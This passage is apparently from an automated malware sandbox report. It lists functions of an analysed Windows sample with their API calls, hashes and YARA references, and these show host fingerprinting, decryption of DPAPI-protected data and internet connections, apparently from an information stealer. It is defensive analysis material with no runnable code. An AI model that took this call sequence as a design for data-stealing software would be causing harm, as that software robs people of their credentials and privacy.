                                                                                                      • API String ID: 211194620-0
                                                                                                      • Opcode ID: e6516416815714df6453fd4f82fac44d28edec781fd119e966b198ebd49bc1bd
                                                                                                      • Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
                                                                                                      • Opcode Fuzzy Hash: e6516416815714df6453fd4f82fac44d28edec781fd119e966b198ebd49bc1bd
                                                                                                      • Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                        • Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                        • Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                        • Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                        • Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                        • Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,02D960E8,00000000,00020119,00000000), ref: 0041433B
                                                                                                        • Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,02DD7F30,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                        • Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                        • Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,02DD8AC0,00000000,?,0041D74C,00000000,?,00000000,00000000,?,02DD50A0), ref: 0041438F
                                                                                                        • Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,02DD8AC0,00000000,?,0041D74C,00000000,?,00000000,00000000,?,02DD50A0), ref: 00414396
                                                                                                        • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02DD51E0,004136EB,0041D6E3), ref: 004143CD
                                                                                                        • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                        • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                        • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                        • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                        • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                        • Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                        • Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                        • Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                        • Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0
                                                                                                        • Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,02DD80E0,00000000,?,0041D758,00000000,?,00000000,00000000,?,02DD8BC0,00000000), ref: 004144C0
                                                                                                        • Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                        • Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                        • Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,02DD80E0,00000000,?,0041D758,00000000,?,00000000,00000000,?,02DD8BC0,00000000), ref: 00414542
                                                                                                        • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                        • Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                        • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                        • Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                        • Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                        • Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A
                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,02DD8AE0,00000000,?,0041D76C,00000000,?,00000000,00000000,?,02DD8008,00000000,?,0041D768,00000000), ref: 0041037E
                                                                                                        • Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                        • Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                        • Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                        • Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                        • Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                        • Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,02D963F8,00000000,00020119,00000000), ref: 0041477B
                                                                                                        • Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,02DD88C0,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                        • Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                        • Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
                                                                                                        • Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855
                                                                                                        • Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
                                                                                                        • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3
                                                                                                        • Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,02DD7F90,00000000,?,0041D774,00000000,?,00000000,00000000,?,02DD81E8), ref: 0041496D
                                                                                                        • Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                        • Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                        • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
                                                                                                        • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
                                                                                                        • Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9
                                                                                                        • Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                        • Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                        • Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D
                                                                                                        • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,02DD5B60,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                        • Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                        • Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
                                                                                                        • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                        • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                        • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                        • Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                        • Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                        • Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                        • Part of subcall function 00414DE0: CloseHandle.KERNEL32(00000000), ref: 00414E9E
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B
                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02DD4F80), ref: 00404ED9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentHandleInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalInternetLastLogicalMemoryModuleNextPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
                                                                                                      • String ID: E.A
                                                                                                      • API String ID: 2827757392-2211245587
                                                                                                      • Opcode ID: 0a1655d69d7d67d09a8accf2191c0ab67cebd284527337da85d13474bea66144
                                                                                                      • Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
                                                                                                      • Opcode Fuzzy Hash: 0a1655d69d7d67d09a8accf2191c0ab67cebd284527337da85d13474bea66144
                                                                                                      • Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                        • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                        • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                        • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                        • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                        • Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                        • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                      • StrStrA.SHLWAPI(00000000,02DD7DB0), ref: 0040971B
                                                                                                        • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                        • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                        • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                        • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                      • memcmp.MSVCRT ref: 00409774
                                                                                                        • Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                        • Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                        • Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                      • String ID: $DPAPI
                                                                                                      • API String ID: 1204593910-1819349886
                                                                                                      • Opcode ID: c29f5cfde4a1b01b633900b3e4d9158c792444f62c15d0bc86c9e383e366a528
                                                                                                      • Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
                                                                                                      • Opcode Fuzzy Hash: c29f5cfde4a1b01b633900b3e4d9158c792444f62c15d0bc86c9e383e366a528
                                                                                                      • Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
                                                                                                      • GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 00415A27
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseCreateHandleSize
                                                                                                      • String ID:
                                                                                                      • API String ID: 1378416451-0
                                                                                                      • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                      • Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
                                                                                                      • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                      • Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02DBD9C8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                      • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                      • CloseHandle.KERNEL32(?,00000000,?,02DBD9C8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                      • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 941982115-0
                                                                                                      • Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                      • Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
                                                                                                      • Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                      • Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Pi@
                                                                                                      • API String ID: 0-1360946908
                                                                                                      • Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                      • Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
                                                                                                      • Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                      • Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CrackInternetlstrlenmalloc
                                                                                                      • String ID: <
                                                                                                      • API String ID: 3848002758-4251816714
                                                                                                      • Opcode ID: 3713e900d8af71bcda43d5451eba343ca8d18ed20fc7c58898e56e18ace5b70f
                                                                                                      • Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
                                                                                                      • Opcode Fuzzy Hash: 3713e900d8af71bcda43d5451eba343ca8d18ed20fc7c58898e56e18ace5b70f
                                                                                                      • Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • StrCmpCA.SHLWAPI(00000000,02DD5260), ref: 0040EFCE
                                                                                                      • StrCmpCA.SHLWAPI(00000000,02DD4F90), ref: 0040F06F
                                                                                                      • StrCmpCA.SHLWAPI(00000000,02DD5060), ref: 0040F17E
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3722407311-0
                                                                                                      • Opcode ID: 3566f950a70d9368d3bab53622fd0af9e896664e0c11b1e93c9bcc657f6cdd2a
                                                                                                      • Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
                                                                                                      • Opcode Fuzzy Hash: 3566f950a70d9368d3bab53622fd0af9e896664e0c11b1e93c9bcc657f6cdd2a
                                                                                                      • Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • StrCmpCA.SHLWAPI(00000000,02DD5260), ref: 0040EFCE
                                                                                                      • StrCmpCA.SHLWAPI(00000000,02DD4F90), ref: 0040F06F
                                                                                                      • StrCmpCA.SHLWAPI(00000000,02DD5060), ref: 0040F17E
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3722407311-0
                                                                                                      • Opcode ID: 6db915fc9aef32804234284a1f8f815ae03aa27e0320bb305d1a5402418195c7
                                                                                                      • Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
                                                                                                      • Opcode Fuzzy Hash: 6db915fc9aef32804234284a1f8f815ae03aa27e0320bb305d1a5402418195c7
                                                                                                      • Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                      • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 3183270410-0
                                                                                                      • Opcode ID: 661a33c798242dc4c855162a281f7223e62ff97b1e9cbda6c059c4df2bfac356
                                                                                                      • Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
                                                                                                      • Opcode Fuzzy Hash: 661a33c798242dc4c855162a281f7223e62ff97b1e9cbda6c059c4df2bfac356
                                                                                                      • Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94
                                                                                                      Uniqueness

